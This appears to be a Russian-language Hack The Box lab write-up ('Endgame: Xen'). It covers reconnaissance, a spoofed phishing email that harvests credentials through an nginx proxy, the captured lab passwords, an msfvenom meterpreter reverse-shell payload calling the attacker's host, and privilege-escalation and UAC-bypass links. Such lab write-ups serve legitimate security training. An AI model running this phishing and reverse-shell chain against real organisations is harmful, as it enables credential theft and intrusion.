###### tags: `HTB` # **Endgame: Xen** Есть начальная точка - адрес 10.13.38.12 Просканим нмапом, посмотрим что есть: `sudo nmap -sV -p - -sT 10.13.38.12` ![](https://i.imgur.com/OoFFdRl.png) Переберем директории: `gobuster dir -u https://humongousretail.com/ -k -e -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt` Уточним какие есть пользователи на почтовом сервере: `smtp-user-enum -M RCPT -U /usr/share/dnsrecon/namelist.txt -D humongousretail.com -t 10.13.38.12` ![](https://i.imgur.com/vqa8Bk5.png) Есть пользователи, нам необходимо перенаправить их авторизацию на наш атакующий сервер, для этого поднимаем nginx с конфигом, в котором указываем адрес сайта жертвы: `nano /etc/nginx/sites-enabled/default` ![](https://i.imgur.com/1J6e8mG.png) Обязательно добавить адрес сайта в etc/hosts ``` cat /home/kali/sort/csr7/body.txt Please http://10.10.14.5/remote/auth/login.aspx ``` Отправляем фишинговый фейковый запрос на авторизацию: > swaks --to sales@humongousretail.com --from it@humongousretail.com --server 10.13.38.12 --port 25 --body body.txt Смотрим, что пришло в вайршарке - пароли! ![](https://i.imgur.com/jQ95JfE.png) awardel @M3m3ntoM0ri@ jmendes VivaBARC3L0N@!!! pmorgan Summer1Summer! Логинимся по этому адресу с любых из учетных записей выше http://humongousretail.com/remote/site/default.aspx Ставим icaclient, логинимся на машину, прокидываем сессию метепретера далее msfvenom делаем reverse tcp полезную нагрузку, получаем сессию meterpreter msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.14.8 -f exe > payload.exe _____ msfconsole: use exploit/multi/handler set lhost tun0 set payload windows/x64/meterpeter/reverse_tcp Повышаем привелегии через https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1 Обходим UAC через: https://0x00-0x00.github.io/research/2018/10/31/How-to-bypass-UAC-in-newer-Windows-versions.html